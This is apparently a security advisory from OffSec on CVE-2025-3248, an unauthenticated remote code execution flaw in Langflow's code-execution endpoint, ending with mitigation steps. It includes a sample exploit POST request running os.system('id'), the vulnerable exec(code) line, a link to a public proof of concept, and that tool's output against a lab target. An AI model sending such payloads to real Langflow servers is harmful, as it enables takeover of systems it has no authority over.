/
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
Jun 18, 2025
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
CVE-2025-3248 is a critical RCE vulnerability in Langflow that allows unauthenticated attackers to execute arbitrary Python code via unsanitized input to exec(). Learn how it works and how to protect your system.
OffSec Team
Overview
CVE-2025-3248 is a critical unauthenticated remote code execution (RCE) vulnerability in Langflow, a popular low-code framework for building LLM applications. The flaw stems from the unsafe use of Python’s built-in exec() function to evaluate user-supplied input without sanitization. This allows attackers to execute arbitrary Python code on the server, completely compromising the underlying system.
- CVE ID: CVE-2025-3248
- Severity: Critical
- CVSS Score: 9.8
- EPSS Score: 92.57%
- Published: May 22, 2025
- Affected Versions: ≤ v1.3.0
- Patched Version: v1.3.0+
Technical Breakdown
Langflow exposes a /api/v1/builder/execute_code endpoint that takes user-supplied Python code and passes it directly to exec() on the backend. Since there’s no authentication or sandboxing, attackers can craft arbitrary payloads for code execution.
POST /api/v1/builder/execute_code
Content-Type: application/json
{
"code": "import os; os.system('id')"
}There is no sandbox, no ast.literal_eval, no subprocess control — just direct unsanitized execution of attacker input.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing- Langflow instance accessible over the network
- No authentication required on vulnerable endpoint
- Version ≤ 1.3.0
Exploitation Steps
A working public PoC is available at: https://github.com/xuemian168/CVE-2025-3248.git
To exploit the vulnerable Langflow instance, clone the repository and execute the provided script against the target.
┌──(kali㉿kali)-[~]
└─$ python main.py -t http://172.17.0.2:7860/
╔══════════════════════════════════════════════════════════════╗
║ Langflow Vulnerability Scanner ║
║ CVE-2025-3248 Detection & Exploitation ║
╚══════════════════════════════════════════════════════════════╝
[*] Testing endpoint: http://172.17.0.2:7860/api/v1/validate/code
[+] Target appears to be vulnerable!
[+] Executing command: id
uid=1000(langflow) gid=1000(langflow) groups=1000(langflow)
Upon successful exploitation, the command executes server-side with the privileges of the langflow process.
Mitigation
- Upgrade to Langflow v1.3.0 or later
- Restrict access to vulnerable endpoints via firewall or reverse proxy
- Remove or replace use of exec() with safer alternatives
- Require authentication on all API endpoints
- Implement runtime application protection and egress restrictions
References
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
CVE-2025-3248 is a critical RCE vulnerability in Langflow that allows unauthenticated attackers to execute arbitrary Python code via unsanitized input to exec(). Learn how it works and how to protect your system.
Jun 18, 2025
2 min read
Research & Tutorials
CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence
Critical RCE vulnerability (CVE-2024-21683) in Atlassian Confluence Data Center and Server (v5.2–8.9.0) allows authenticated users to execute arbitrary code via malicious code macros.
Jun 12, 2025
2 min read
Research & Tutorials
CVE‑2025‑49113 – Post‑Auth Remote Code Execution in Roundcube via PHP Object Deserialization
A critical RCE vulnerability (CVSS 9.9) in Roundcube Webmail (
Jun 12, 2025
3 min read